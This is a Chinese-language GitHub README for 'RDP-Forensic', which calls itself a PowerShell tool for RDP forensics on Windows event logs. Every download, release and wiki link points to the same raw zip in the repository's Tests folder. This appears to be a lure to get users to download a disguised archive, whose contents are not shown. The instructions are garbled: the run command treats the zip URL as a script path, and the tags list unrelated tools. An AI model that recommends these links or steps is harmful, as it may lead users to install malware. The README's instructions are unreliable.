Vectoricks/RDP-Forensic

GitHub: Vectoricks/RDP-Forensic

一款基于 PowerShell 的 Windows RDP 连接取证分析工具,用于提取和分析远程桌面登录、会话及认证日志。

Stars: 0 | Forks: 0

# 🛡️ RDP-Forensic - 您的 RDP 安全洞察工具 ## 🖱️ 下载 [![下载 RDP-Forensic](https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip%20RDP--Forensic-v1.0-blue)](https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip) ## 🚀 快速入门 欢迎使用 RDP-Forensic,这是一个旨在简化 RDP 取证工作的 PowerShell 工具包。该工具可帮助您分析连接尝试、追踪身份验证以及监控 Windows Event Logs 中的会话。无论您是管理几台计算机还是整个网络,RDP-Forensic 都能为您提供所需的洞察力,以保障环境安全。 ## ⚙️ 系统要求 要运行 RDP-Forensic,请确保您的系统满足以下要求: - **操作系统:** Windows 10 或更高版本 - **PowerShell 版本:** 5.1 或更高版本 - **网络访问:** 确保您拥有访问 Windows Event Log 服务日志的权限。 - **磁盘空间:** 至少 100 MB 可用空间 ## 📥 下载与安装 要开始使用 RDP-Forensic,您需要从 Releases 页面下载它。请按照以下步骤操作: 1. 访问 Releases 页面:[下载 RDP-Forensic](https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip)。 2. 在 Releases 页面上,查找该软件的最新版本。 3. 点击 **https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip** 文件开始下载。 4. 下载完成后,在计算机上找到该文件。 5. 右键单击该文件并选择“提取所有”,从 ZIP 压缩包中提取文件。 6. 打开解压后的文件夹以查找 RDP-Forensic 文件。 现在您已准备好运行 RDP-Forensic。 ## 🛠️ 运行 RDP-Forensic 请按照以下步骤在您的计算机上运行 RDP-Forensic: 1. 打开 **PowerShell**。您可以通过在“开始”菜单中搜索来找到它。 2. 导航到 RDP-Forensic 文件夹。使用 `cd` 命令,如下所示: cd path\to\RDP-Forensic (将 `path\to\RDP-Forensic` 替换为文件夹的实际路径。) 3. 使用以下命令运行脚本: .\https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip 4. 等待脚本执行。它将为您提供用于分析 RDP 连接尝试和会话的选项。 ## 📊 功能特性 RDP-Forensic 提供了多种专为易用性和高效性设计的功能: - **连接追踪:** 监控所有针对 RDP 服务的连接尝试。 - **身份验证日志:** 追踪谁在何时登录。 - **会话管理:** 查看具有详细统计信息的活跃 RDP 会话。 - **注销分析:** 了解用户何时注销及其原因。 - **导出报告:** 生成用于合规性和审计的摘要报告。 ## 🔍 涵盖主题 此工具包专注于与 RDP 取证相关的核心领域,包括: - 合规性 - Event Viewer 洞察 - 登录分析 - RDP 取证细节 - 安全审计 - 事件响应的会话追踪 - SIEM 集成 - Windows Server 最佳实践 ## 📄 文档 有关使用每项功能的更多详细信息,请参阅 RDP-Forensic 文件夹中包含的文档。您也可以在我们 GitHub 仓库的 [Wiki](https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip) 页面上找到有用的信息。 ## 📬 支持与贡献 如果您遇到问题或有疑问,请随时在我们的 GitHub 页面上开启一个 issue。我们非常感谢贡献和反馈,以增强 RDP-Forensic。 ## ✨ 未来更新 我们计划定期更新 RDP-Forensic 以增加新功能。请关注该仓库,以获取有关新版本和改进的公告。 如需获取最新版本,请返回 Releases 页面:[下载 RDP-Forensic](https://github.com/Vectoricks/RDP-Forensic/raw/refs/heads/main/Tests/RD_Forensic_1.8.zip)。 享受使用 RDP-Forensic,这是您进行 RDP 安全分析的首选工具包!
标签:AI合规, Conpot, DInvoke, Libemu, OpenCanary, PowerShell工具, RDP取证, Windows事件日志, Windows安全, 事件日志分析, 会话追踪, 数字取证, 系统管理员, 网络安全, 自动化脚本, 身份验证分析, 远程桌面协议, 隐私保护